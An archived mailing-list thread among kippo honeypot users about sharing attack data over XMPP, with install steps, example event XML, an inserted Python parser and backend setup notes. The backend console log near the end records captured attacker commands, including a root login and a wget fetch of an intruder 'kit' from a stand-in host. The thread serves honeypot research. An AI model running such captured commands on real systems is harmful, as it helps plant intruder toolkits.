Sorry everyone for being quiet after starting this group, but I was offered a job on the other side of the country and needed to move, start work, and all the stuff that goes with that. But I found myself with a free weekend and I decided it was a good time to set up a server with, at least in the beginning, a blog for us to collectively write about kippo and honeypots in general. We can as a group decide whether we want to do something different. Now I have no problem setting up a VPS to solely host the website and whatever other stuff we want to have there for group access. But if someone has another idea, I am willing to hear it. The second thing is, I have no clue what domain to get for this website. Anyone have any ideas?
- biosshadow
--
You received this message because you are subscribed to the Google Groups "kippo users" group.
To post to this group, send email to kippo...@googlegroups.com.
To unsubscribe from this group, send email to kippousers+...@googlegroups.com.
For more options, visit this group at http://groups.google.com/group/kippousers?hl=en.
I am interested in this. Not how many other ppl are, but it would make sharing stats easier.
Andrew top posting?
> Justin Elze wrote:
>> Bump since everyone is back to only chatting on twitter about this...
>>
>> Any interest in a centralized MySQL database starting off with a few people
>> and tracking results from around the world?
On Fri, Oct 22, 2010 at 3:43 PM, AndrewWaite <a...@infosanity.co.uk> wrote:
> theoretically should be simple, just needs a publicly accessible MySQL
> daemon and people to reconfigure their sensors. However, I can see a
> number of problems before this can/will get off the ground:
central db? bad idea for all obvious reasons.
I'd go for a distributed network and everybody can have his own
database, with information from all sensors as outlined? here:
http://groups.google.com/group/kippousers/msg/f0d0ecb823e67f0e
I set up docs on how to install prosody and host a branch of the code with
the patches applied, http://carnivore.it/2010/10/13/xmpp_server
Markus
It could write to an additional table in the local kippo database to keep
track of which sessions have been sent forward.
Something like this would be easy for anyone to implement in their favorite
language and platform, and hopefully my laziness with kippo development isn't
hurting deployments like this :)
On Fri, Oct 22, 2010 at 5:08 PM, Justin Elze <formu...@gmail.com> wrote:
> Are you going to rewrite Kippo to export data into a xmpp server?
Actually I doubt a rewrite would be required in any way, it would plug
in the same way as mysql, and twisted even has multiple protocol
implementations for xmpp.
> This is what happened last time everyone jumped in with great ideas but no
> real motivation to follow up.
How can you expect anybody to contribute anything if there is no final
"we are interested in the functionality and accept patches" or at
least a basic level of interest?
> No issues if someone wants to make XMPP work with kippo since it obviously
> scales well....Kippo isn't going to catch some 0day attack or anything
> overly interesting.
I don't see the point.
> However was more interested in statistical information source IP, source
> country, password combos, where backdoors are hosted.
Which is exactly the information one could distribute via xmpp.
If you want to look at it before making a point, let me hook you up
with the required credentials to do so.
Markus
On Sat, Oct 23, 2010 at 12:39 AM, Justin Elze <formu...@gmail.com> wrote:
> Would you be the person developing the XMPP integration? What
> assistance/resources would you need?
Testers,
svn co https://svn.ik.nu/wokkel/branches/wokkel-muc-client-support-24 wokkel
cd wokkel
python setup.py install
svn checkout http://kippo.googlecode.com/svn/trunk/ kippo-xmpp
cd kippo-xmpp
wget http://p.carnivore.it/Kx015D?download -O /dev/stdout | patch -p0
cp kippo.cfg.dist kippo.cfg
# edit kippo.cfg, allow the xmpp section, edit kippo-revents to kippo-events
twistd -ny kippo.tac
-------------------
todo?
* currently it replaces the mysql logging, I did not understand the
twisted thing to have multiple log observers, should be fixed by
somebody who understands twisted
* the xmpp client is initialized in the tac file, it does not start if
initialized somewhere else, I *guess* that's a twisted feature, but
maybe somebody who understands twisted can fix it
* set self.xmppclient.logTraffic to False if you are annoyed by the
messages (/dblog/xmpp.py:57)
* the code supports anonymizing the honeypot's IP address, this is
turned on by default and there is no config option yet to turn it off,
so the honeypot always reports itself as 127.0.0.1
* xmlns url for kippo is wrong
* bribe somebody to apply the patch to svn, so we can beautify it
* backend code to retrieve the messages from xmpp and store in a
database, I'd adjust the pg_backend code dionaea ships with to deal
with the kippo namespace & messages
documentation?
* it uses a special wokkel branch, which adds muc to twisted's xmpp stack.
* you specify an xmpp server, username, password, muc, and channels for
the different signals you have (client connected, client disconnected,
command, login, ...), and it joins the channel, and sends the message
to the channel.
* once ssh-action happens, it sends a properly formatted xml message to
the channel, I figured out the xml format myself, it is similar to the
format I use for dionaea.
Some example messages:
CreateSession:
<kippo xmlns='http://http://kippo.googlecode.com'
type='createsession'><session local_host='127.0.0.1' local_port='2222'
session='da2dde7c2e9b4f96bdd94172eb274c9f' remote_host='192.168.53.21'
remote_port='4271'/></kippo>
ConnectionLost:
<kippo xmlns='http://http://kippo.googlecode.com'
type='connectionlost'><session
session='da2dde7c2e9b4f96bdd94172eb274c9f'/></kippo>
Command:
<kippo xmlns='http://http://kippo.googlecode.com'
type='command'><command session='349ae44535d34bab9c548f3af21f0fcd'
command='known'>cd /tmp</command></kippo>
Yep, there is *some* overhead, but it is easy to parse.
> Anyone else have useful suggestions?
Yep, I set up a privileged account for you, if you want to hack a
backend based on pg_backend, you can use the user
ki...@sensors.carnivore.it with password kippo,
you got elevated privileges on the channel kippo-events in the
dionaea.sensors.carnivore.it muc, so there is no reason not to start
hacking on it.
If you access the service with an xmpp client like psi, turn on the
"XML Console", as the messages are unencoded xml and psi does not render
them properly.
If nobody stands up, I'll contribute the backend code too, and I
promise it won't be mysql compatible.
Markus
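As an added example that is not part of the mail or of the kippo/dionaea code, here is a Python parser for the three event types shown above, written the way a pg_backend-style consumer would check each MUC message before storing it; the namespace is taken verbatim from the examples:

```python
import xml.etree.ElementTree as ET

# Namespace exactly as in the example messages above (the author notes the
# xmlns url is wrong; a backend must match what the client actually sends).
KIPPO_NS = "http://http://kippo.googlecode.com"

# Constructed samples, copied from the three example messages above.
SAMPLES = [
    "<kippo xmlns='http://http://kippo.googlecode.com' type='createsession'>"
    "<session local_host='127.0.0.1' local_port='2222' "
    "session='da2dde7c2e9b4f96bdd94172eb274c9f' remote_host='192.168.53.21' "
    "remote_port='4271'/></kippo>",
    "<kippo xmlns='http://http://kippo.googlecode.com' type='connectionlost'>"
    "<session session='da2dde7c2e9b4f96bdd94172eb274c9f'/></kippo>",
    "<kippo xmlns='http://http://kippo.googlecode.com' type='command'>"
    "<command session='349ae44535d34bab9c548f3af21f0fcd' command='known'>"
    "cd /tmp</command></kippo>",
]

def parse_kippo_event(xml_text):
    """Turn one kippo XMPP event into a flat dict: 'type' from <kippo>,
    every attribute of the single payload element (session id, hosts,
    ports, command status) and 'text' for the body (the typed command).
    Anything else raises ValueError, so a backend does not store arbitrary
    MUC traffic."""
    root = ET.fromstring(xml_text)
    if root.tag != "{%s}kippo" % KIPPO_NS:
        raise ValueError("not a kippo event: %r" % root.tag)
    event_type = root.get("type")
    if not event_type:
        raise ValueError("kippo event without type attribute")
    children = list(root)
    if len(children) != 1:
        raise ValueError("expected exactly one payload element")
    payload = children[0]
    record = {"type": event_type}
    record.update(payload.attrib)
    # Attacker-typed input lands here; write it to the db with parameterised queries.
    record["text"] = (payload.text or "").strip()
    if "session" not in record:
        raise ValueError("kippo event without session id")
    return record

def is_kippo_event(xml_text):
    try:
        parse_kippo_event(xml_text)
        return True
    except (ET.ParseError, ValueError):
        return False
```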
On 10/23/10 7:19 AM, Markus wrote:
Client code:
Updated patch for latest kippo revision to report to xmpp:
http://p.carnivore.it/uUovYX
Installation as outlined in previous mail.
Backend code
code:
http://p.carnivore.it/RqMsyp
# aptitude install python-pyxmpp python-pgsql
with db
./pg_backend.py -U ki...@sensors.carnivore.it -P kippo -M
dionaea.sensors.carnivore.it -C kippo-events -s DBHOST -u DBUSER -d
xmpp -p DBPASS -f /tmp/
without db
./pg_backend.py -U ki...@sensors.carnivore.it -P kippo -M
dionaea.sensors.carnivore.it -C kippo-events -f /tmp/
Database schema addon which adds the required tables for kippo in the
kippo namespace:
http://p.carnivore.it/80XWG4
the schema is similar to kippo's own schema, basically I just got rid of
calling every primary key "id" to allow natural joining.
basic instructions for the database, I don't remember all steps, in
case you get it working, please complete the steps required.
install postgres,
create a user "xmpp"
su postgres
createuser --no-createdb --encrypted --login --pwprompt
--no-createrole --no-superuser xmpp
edit /etc/postgresql/8.4/main/pg_hba.conf
add a line to allow the xmpp user to connect to the database from
local host with password authentication
# TYPE DATABASE USER CIDR-ADDRESS METHOD
local xmpp xmpp md5
restart postgres for the changes to take effect.
create a database "xmpp"
createdb --owner xmpp xmpp
apply the schema, start the backend code
psql -U xmpp xmpp < theschema.sql
the backend code writes some status information on the console:
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV]
createsession: 127.0.0.1 127.0.0.1 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] version
SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] : login
False root test 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] : login
True root 123456 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] command
cd /tmp 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] command
wget http://www.example.com/root/kit.tar.gz
2390be85d17645ecb3a0b936cd275dfe
Markus